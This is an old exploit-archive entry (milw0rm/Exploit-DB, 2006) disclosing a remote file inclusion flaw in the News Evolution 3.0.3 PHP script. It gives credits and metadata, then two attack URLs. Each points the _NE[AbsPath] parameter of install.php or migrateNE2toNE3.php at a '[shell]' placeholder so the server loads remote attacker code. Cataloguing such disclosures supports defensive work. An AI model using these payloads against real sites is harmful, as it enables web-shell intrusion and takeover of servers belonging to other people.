News Evolution 3.0.3 - _NE[AbsPath] Remote File Inclusion

Author: ddoshomo
type: webapps
platform: php
port: 
date_added: 2006-09-06 
date_updated:  
verified: 1 
codes: OSVDB-30790;CVE-2006-4678;OSVDB-30789 
tags: 
aliases:  
screenshot_url:  
application_url: 

# ERNE ---- ERNEALiZM ---- BU ASK BiTMEZ----

# News Evolution v3.0.3 - Remote File Include Vulnerabilities

# site    : http://www.comscripts.com/jump.php?action=script&id=825

# Script  :  News Evolution v3.0.3

# Credits : ERNE

# Contact : erne@ernealizm.com  and irc.gigachat.net #kurdhack

# Thanks  : BLaCKWHITE, Blackened, Di_lejyoner

# Vulnerable :

     http://www.site.com/[path]/install.php?_NE[AbsPath]=[shell]

     http://www.site.com/[path]/migrateNE2toNE3.php?_NE[AbsPath]=[shell]

# milw0rm.com [2006-09-07]